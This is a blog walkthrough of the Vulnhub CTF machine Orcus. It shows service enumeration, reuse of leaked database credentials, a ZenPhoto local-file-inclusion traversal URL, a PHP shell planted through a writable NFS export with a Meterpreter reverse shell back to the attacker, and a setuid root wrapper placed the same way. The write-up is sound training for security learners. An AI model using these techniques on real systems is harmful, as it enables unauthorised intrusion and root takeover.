Vulnhub Orcus walkthrough

From boot to root

20 April 2017

So, I had a lot of fun with the series of three CTF machines that Viper published on Vulnhub. The first two are pretty good ‘basic’ VMs and already have walkthroughs published with their Vulnhub entries. However, at the time of this writing, the third ‘hard’ VM, Orcus, doesn’t have anything published, so I figured I’d go ahead and put my solution out for the public.

As you might deduce from the file dates on my terminal output, I’ve basically reconstructed my killchain from my notes and logs doing this machine in late March, per my referenced tweet later. As such there is a mix of the old .24 IP address and the ‘newer’ .92 address from my reconstructed killchain. Please excuse the mess.

This walkthrough is reasonably complete, though I didn’t bother with the second of the post-exploitation flag, because the hint is just too vague (“What is different about this machine vs the others?” Answer: tons of things).

I downloaded the VM file and imported it into my XenServer host with the tool built into XenCenter. I assigned it a static DHCP lease, so there will be no ‘find the VM’ step here.

The Start

First off, the usual nmap output. I scanned all TCP ports, and then more thoroughly interrogated the results of the first scan.

# Nmap 7.40 scan initiated Fri Mar 17 08:32:35 2017 as: nmap -A -p 22,53,80,110,111,139,143,443,445,993,995,2049,36626,36977,46053,46105 -oN 10.10.0.24-ports_interrogate.txt 10.10.0.24
Nmap scan report for 10.10.0.24
Host is up (0.0036s latency).
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp    open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING TOP SASL CAPA STLS AUTH-RESP-CODE RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46053/tcp  mountd
|   100005  1,2,3      53573/udp  mountd
|   100021  1,3,4      45748/udp  nlockmgr
|   100021  1,3,4      46105/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: LITERAL+ STARTTLS post-login have IMAP4rev1 LOGINDISABLEDA0001 more listed ENABLE Pre-login ID LOGIN-REFERRALS OK IDLE SASL-IR capabilities
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: LITERAL+ Pre-login post-login have IMAP4rev1 AUTH=PLAINA0001 more listed ENABLE ID LOGIN-REFERRALS OK IDLE SASL-IR capabilities
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs_acl     2-3 (RPC #100227)
36626/tcp open  mountd      1-3 (RPC #100005)
36977/tcp open  mountd      1-3 (RPC #100005)
46053/tcp open  mountd      1-3 (RPC #100005)
46105/tcp open  nlockmgr    1-4 (RPC #100021)
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T09:32:47-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 17 08:32:58 2017 -- 1 IP address (1 host up) scanned in 23.60 seconds
0

So, a few things of note can be seen right off. There are two SSH listeners, one sitting on what would normally be a TLS/HTTPS port. There is an nfs shared mount, for once (how many times do you see RPC on 111, only to not find useful things?). There is a Samba setup, might be useful for gathering some usernames, or poorly-configured shares. But as we’ll see, most of the time on this box will be spent interacting with Apache on port 80.

I did poke the Samba service, and not much came back from it. I’ve pared down the full output.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 19 10:14:04 2017

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.0.24
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

[SNIP]

===========================
|    Users on 10.10.0.24    |
===========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper	Name: viper	Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root	Name: root	Desc:

user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]

[SNIP]

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)

That was about it for potential hints. A couple of usernames that might be something later.

I also took the chance here to use metasploit’s NFS enum module to investigate the nfs mount. It appeared to be exporting the system’s /tmp directory, but nothing of interest was present. Just some systemd files. However, there was something interesting about the mount. Let’s see if we have write privs.

[jon@motoko-chan]$ sudo mount 10.10.0.92:/tmp /mnt
[sudo] password for jon:

[jon@motoko-chan]$ ll /mnt
total 8.0K
drwx------ 3 root root 4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-dovecot.service-NxoVDg
drwx------ 3 root root 4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-systemd-timesyncd.service-2xbuIL
[jon@motoko-chan]$ cd /mnt
[jon@motoko-chan]$ touch test.txt
[jon@motoko-chan]$ ll
total 8.0K
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-dovecot.service-NxoVDg
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-systemd-timesyncd.service-2xbuIL
-rw-r--r-- 1 jon  users    0 Apr 20 00:59 test.txt
[jon@motoko-chan]$ sudo touch root.txt
[jon@motoko-chan]$ ll
total 8.0K
-rw-r--r-- 1 root root     0 Apr 20 01:00 root.txt
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-dovecot.service-NxoVDg
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-systemd-timesyncd.service-2xbuIL
-rw-r--r-- 1 jon  users    0 Apr 20 00:59 test.txt
0

Weeelllll, that’s Bad. And Interesting! This nfs mount is configured to not ‘squash’ UIDs and GIDs into a specific, non-privileged account. This isn’t code execution by itself, but should be important later.

Moving along, time for more enumeration. We fire up gobuster and have a look at the webserver.

[jon@motoko-chan]$ gobuster -u 10.10.0.24 -w ../../../../wordlists/Discovery/Web_Content/raft-small-directories-lowercase.txt

Gobuster v1.3                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.0.24/
[+] Threads      : 10
[+] Wordlist     : ../../../../wordlists/Discovery/Web_Content/raft-small-directories-lowercase.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/admin (Status: 301)
/tmp (Status: 301)
/themes (Status: 301)
/install (Status: 301)
/files (Status: 301)
/javascript (Status: 301)
/webalizer (Status: 200)
/cron (Status: 301)
/phpmyadmin (Status: 301)
/backups (Status: 301)
/external (Status: 301)
/framework (Status: 301)
/zenphoto (Status: 301)
=====================================================

So, we’ve already gotten some good results. These directories, plus the results from the nmap output and the robots.txt were enough for me to do some googling and determine I was dealing with ExponentCMS, phpmyadmin, ZenPhoto, and maybe others. The Webalizer directory appeared to be empty, or at least not have either indexing or a ‘default’ index file. The admin/ appeared at first glance in a web browser to be empty as well, but curl reveals all…

jon@motoko-chan]$ curl http://10.10.0.92/admin/
<!-- This is a backup taken from the backups/-->

It seems there is an implicit index.php file with just a HTML comment. Since the hint appeared to point at the backups/, I poked around in there too.

[jon@motoko-chan]$ curl -sL http://10.10.0.92/backups/ | html2text
****** Index of /backups ******
[[ICO]]       Name                         Last modified    Size Description
============================================================================
[[PARENTDIR]] Parent Directory                                 -  
[[   ]]       SimplePHPQuiz-Backupz.tar.gz 2016-10-31 20:29 210K  
[[   ]]       ssh-creds.bak                2016-11-01 21:33   12  
============================================================================
     Apache/2.4.18 (Ubuntu) Server at 10.10.0.92 Port 80

Of course, our eyes jump to that tasty-looking ssh ‘creds’ file, but it’s suspiciously small… Turns out that it doesn’t matter.

[jon@motoko-chan]$ curl -s http://10.10.0.92/backups/ssh-creds.bak | html2text
****** Forbidden ******
You don't have permission to access /backups/ssh-creds.bak on this server.
===============================================================================
     Apache/2.4.18 (Ubuntu) Server at 10.10.0.92 Port 80

Of course we don’t…

I went ahead and pulled down the tar archive file, and had a look around in the contents. True to its name, it was SimplePHPQuiz. The includes/ seemed to have a nice file though.

[jon@motoko-chan]$ cat includes/db_conn.php
<?php

//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
	echo "Could not connect to MySql. Please try again";
	exit();
}

?>

Okay, so cool set of creds. We have the phpMyAdmin to investigate as well, but let’s look and see if the quiz application is present.

[jon@motoko-chan]$ curl -s http://10.10.0.92/SimplePHPQuiz/index.php | html2text

 Toggle navigation     Simple PHP Quiz
    * Home
    * Add Quiz
    * View Result

Notice: Trying to get property of non-object in /var/www/html/SimplePHPQuiz/
quiz.php on line 13
There is no question in the database

So, the application is present but hasn’t been set up or populated with quizes. Visiting the site in a browser and attempting to add a quiz question just explodes in a database error. Perhaps the database isn’t actually up? Or the permissions of the supplied user are wrong?

I decide to visit the phpMyAdmin site and see what I can get. I supply the leaked creds, and indeed I am granted access.
phpmyadmin_img1 phpmyadmin_img2

Some more information leaks about the server as well. The account is fairly privileged as well, and normally you would proceed with using the INTO OUTFILE SQL commands to get yourself a nice shell. However, this mysqld is running with the secure-file-priv option, and thus I can’t seem to write the shell file anywhere that I also have read access too from the webserver. I was able to use the LOAD DATA LOCAL INFILE '<file>' INTO TABLE <db>.<tbl> to poke around the filesystem a bit.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
bind:x:104:114::/var/cache/bind:/bin/false
postfix:x:105:115::/var/spool/postfix:/bin/false
dovecot:x:106:117:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:118:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:108:119::/var/lib/landscape:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:110:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
avahi:x:111:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
kippo:x:1001:27::/home/kippo:/bin/bash
statd:x:113:65534::/var/lib/nfs:/bin/false
systemd-timesync:x:114:125:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:115:126:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:116:127:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:117:128:systemd Bus Proxy,,,:/run/systemd:/bin/false
uuidd:x:100:101::/run/uuidd:/bin/false
lxd:x:118:65534::/var/lib/lxd/:/bin/false
_apt:x:119:65534::/nonexistent:/bin/false
dnsmasq:x:120:65534:dnsmasq,,,:/var/lib/misc:/bin/false

Notably, other than ‘kippo’ this information doesn’t line up with the output from Samba earlier, so that was probably just a red herring. Without the ability to spawn a shell from the database server, I went onwards.

Unprivileged Shell

‘Onwards’ ended up taking awhile. You see, zenphoto, ExponentCMS and the SimplePHPQuiz all have published vulns, so I wasted a couple of hours on this trying to suss out the way forward. The SimplePHPQuiz install appears to be broken as described above, as does ExponentCMS.

ZenPhoto was a little different. It was in a state of unfinished setup at the beginning. It was wanting to use ‘root@local’ for the database user, etc. Once I supplied it with the working creds leaked earlier, the setup completed after a few more steps.

[jon@motoko-chan]$ curl -sL http://10.10.0.92/zenphoto/ | html2text


****** [Zenphoto Setup] Setup ******
Welcome to Zenphoto! This page will set up Zenphoto 1.4.10 on your web server.
***** Systems Check: *****
Installing Zenphoto v1.4.10
zp-data security
PHP version 7.0.8-0ubuntu0.16.04.3
PHP Sessions.
PHP Register Globals
PHP Safe Mode
Testing Magic_quotes.
PHP magic_quotes_gpc
PHP magic_quotes_runtime
PHP magic_quotes_sybase
PHP display_errors
PHP gettext() support
PHP flock support
Testing mb_strings.
PHP mbstring package
zenphoto.cfg.php file
Testing File permissions.
File Permissions [are relaxed (0664)] Notice! click for details
****** Notice! ******
If file permissions are not set to strict or tighter there could be a security
risk. However, on some servers Zenphoto does not function correctly with tight
file permissions. If Zenphoto has permission errors, run setup again and select
a more relaxed permission.
readonly (0444)strict (0644)relaxed (0664)loose (0666)apply
.
Testing Database.
PHP MySQLi support
PHP PDO_MySQL support
PHP MySQL support [is not installed]
Testing Database connection.
Database credentials in configuration file
****** Error! ******
MySQLi reported: Access denied for user 'root'@'localhost'
Fill in the information below and setup will attempt to update your
configuration file.

Database engine       [One of: MySQLi/PDO_MySQL/MySQL]
Database user         [root                                    ]
Database password     [****************************************]
Database host         [localhost                               ]
Database name         [zenphoto                                ]
Database table prefix [zenphoto_                               ]
                      [save]
Testing Zenphoto files.
Zenphoto core files
.htaccess file (RewriteEngine is ON)
.htaccess RewriteBase is /zenphoto
robots.txt file [Not created] Notice! click for details
****** Notice! ******
Setup did not create a robots.txt file because one already exists.
albums folder
cache folder
locale folders
uploaded folder
zp-data folder
HTML cache folder (cache_html)
Third party plugins folder (plugins)
You need to address the problems indicated above then run setup again.
 Refresh


    * [English (United States)]

zenphoto | Forum | Bugtracker | Change log

Setup page after supplying working credentials:
zenphoto_picture2

Admin user creation step
zenphoto_picture1

ZenPhoto has quite a history.

[jon@motoko-chan]$ searchsploit -t zenphoto
----------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------
 Exploit Title                                                                                                                           |  Path
                                                                                                                                         | (/usr/share/exploitdb-git/platforms/)
----------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------
ZenPhoto 1.1.3 - 'rss.php albumnr' SQL Injection                                                                                         | php/webapps/4823.pl
ZenPhoto 1.2.5 - Completely Blind SQL Injection                                                                                          | php/webapps/9154.js
ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)                                                                                     | php/webapps/9166.txt
ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities                                                                   | php/webapps/14359.html
ZenPhoto - Config Update / Command Execution                                                                                             | php/webapps/15114.php
ZenPhoto 1.4.11 - Remote File Inclusion                                                                                                  | php/webapps/39571.txt
ZenPhoto 1.4.0.3 - x-forwarded-for HTTP Header Persistent Cross-Site Scripting                                                           | php/webapps/17200.txt
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution                                                                        | php/webapps/18083.php
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities                                                                                              | php/webapps/22524.txt
ZenPhoto 0.9/1.0 - i.php a Parameter Cross-Site Scripting                                                                                | php/webapps/27795.txt
ZenPhoto 0.9/1.0 - 'index.php' Multiple Parameter Cross-Site Scripting                                                                   | php/webapps/27796.txt
ZenPhoto 1.3 - zp-core/full-image.php a Parameter SQL Injection                                                                          | php/webapps/34610.txt
ZenPhoto 1.3 - zp-core/admin.php Multiple Parameter Cross-Site Scripting                                                                 | php/webapps/34611.txt
ZenPhoto 1.4.0.3 - '_zp_themeroot' Parameter Multiple Cross-Site Scripting Vulnerabilities                                               | php/webapps/35648.txt
ZenPhoto 1.4.8 - Multiple Vulnerabilities                                                                                                | php/webapps/37602.txt
ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting                                                                                | php/webapps/37903.txt
ZenPhoto - 'index.php' SQL Injection                                                                                                     | php/webapps/38326.txt
ZenPhoto 1.4.10 - Local File Inclusion                                                                                                   | php/webapps/38841.txt
ZenPhoto - SQL Injection                                                                                                                 | php/webapps/39062.txt
----------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------

The relevant result is for 1.4.10. The output basically reads as a directory traversal from a php script parameter. The malicous URL basically looks like this.

http://10.10.0.92/zenphoto/zp-core/pluginDoc.php?thirdparty=1&extension=../../../../../etc/passwd

Of course, it’s not that easy. The exploit report appears to be written against a WAMP stack and not a LAMP one. Perhaps its different there, but intentionally or not, an important detail is left out of the description. If you try out the PoC as-is, all you’ll get is a 500 error from the server.

I had to fuss around with this for awhile before finally caving and looking at the php on GitHub. (Remember to select the 1.4.10 tag from the repo, or you’ll see different stuff!)

$extension = sanitize($_GET['extension']);
$thirdparty = isset($_GET['thirdparty']);

if ($thirdparty) {
  $pluginToBeDocPath = SERVERPATH . '/' . USER_PLUGIN_FOLDER . '/' . $extension . '.php'; <--- Of course they did this...
} else {
  $pluginToBeDocPath = SERVERPATH . '/' . ZENFOLDER . '/' . PLUGIN_FOLDER . '/' . $extension . '.php';
}

So yeah, they’re appending the extension to the damned file. That would have been a great thing to point out in the PoC, but again, maybe the WAMP acts differently.

(If you’re mumbling something about null terminators, check out the PHP version from the phpMyAdmin image above…)

Anyway, after sorting that out, we can prove it works like this.

zenphoto_traversal

That’s the ExponentCMS index referenced and run by the vulnerable ZenPhoto php script.

So we have code execution, and we have code writing from the nfs mount. By their powers combined…

[jon@motoko-chan]$ ll
total 12K
-rwxr-xr-x 1 jon  users  948 Apr 19 23:34 shell.php
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-dovecot.service-NxoVDg
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-systemd-timesyncd.service-2xbuIL
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LHOST 10.10.0.241
LHOST => 10.10.0.241
msf exploit(handler) > set LPORT 2232
LPORT => 2232
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.10.0.241:2232
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 10.10.0.92
[*] Meterpreter session 1 opened (10.10.0.241:2232 -> 10.10.0.92:49840) at 2017-04-19 23:38:32 -0500

meterpreter > getuid
Server username: www-data (33)

Cool beans. I spawned a pty with python, and the first flag was found quickly.

www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$

Escalation (that took too long)

Cue me doing the usual automated and manual privilege escalation and exploitation cycle for 6 hours like an idiot. I had forgotten the most important thing. Just to rub it in, here’s my flailing around.

  • chocobo race thingy doesn’t work because it’s x64 only
  • DCCP exploit doesn’t work either
  • ubuntu version not affected by 40003
  • not vulnerable to BPF thing from goog or msf 40759
  • CVE-2016-4997 patched out in 4.4.0-28
  • really tried both keyring things because the CVE searches suggested that this kernel might have actually been vulerable? w/e

That was in addtion to manually poking around for misconfigurations (having forgotten the important one…), leaked creds, hints, etc. Then I remembered. I remembered the dumb setup on the nfs export.

I took a bog-standard suid wrapper and placed it on the server though the mount, and ran gcc from the server through my session.

Just a hop skip and a jump from there.

[jon@motoko-chan]$ ll
total 24K
-rwxr-xr-x 1 http http  7.3K Apr 19 23:45 esc
-rwxr-xr-x 1 jon  users  948 Apr 19 23:34 shell.php
-rw-r--r-- 1 jon  users   76 Apr 19 23:44 suid_bash.c
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-dovecot.service-NxoVDg
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-systemd-timesyncd.service-2xbuIL
[jon@motoko-chan]$ sudo chown root:root esc
[sudo] password for jon:
[jon@motoko-chan]$ sudo chmod 4755 esc
[jon@motoko-chan]$ ll
total 24K
-rwsr-xr-x 1 root root  7.3K Apr 19 23:45 esc
-rwxr-xr-x 1 jon  users  948 Apr 19 23:34 shell.php
-rw-r--r-- 1 jon  users   76 Apr 19 23:44 suid_bash.c
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-dovecot.service-NxoVDg
drwx------ 3 root root  4.0K Apr 19 06:01 systemd-private-fbb0afa100384fffa859861f7e7c032d-systemd-timesyncd.service-2xbuIL
www-data@Orcus:/tmp$ ./esc
./esc
root@Orcus:/tmp# cd /root
cd /root
root@Orcus:/root# ls -l
ls -l
total 4
---------- 1 root root 33 Oct 22 13:36 flag.txt # dem privs tho...
root@Orcus:/root# cat flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe
root@Orcus:/root#

As for that ssh-creds file? Yeah, about that.

root@Orcus:/root# ls -l /var/www/html/backups/
ls -l /var/www/html/backups/
total 216
-rw-r--r-- 1 www-data www-data 215368 Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz
--w------- 1 www-data www-data     12 Nov  1 21:33 ssh-creds.bak # those privs I don't even
root@Orcus:/root# cat /var/www/html/backups/ssh-creds.bak
cat /var/www/html/backups/ssh-creds.bak
root:123456
root@Orcus:/root#

Naturally, a red herring, as those creds don’t match anything at all.

That about wraps it up. The first post-exploitation flag is pretty easy to track down even without the elevated privs of root, if you’re doing good enumeration. Hint: it has to do with one of the ‘users’ you found.

I feel dumb for having forgotten about the nfs permissions, and in fact tweeted as such to Viper. Overall though, I don’t think the machine was really in the ‘hard’ category. I do agree with his description on the Vulnhub page though that, unless you have some experience with Linux in a server or network setting, you might not even know about the way nfs interacts with clients and UIDs/GIDs. However, one person’s hard is another person’s easy, so don’t take my statement as a boast. I’ve spent more time on easier machines before.


by:
0meta Staff

(blog@0metasecurity.com)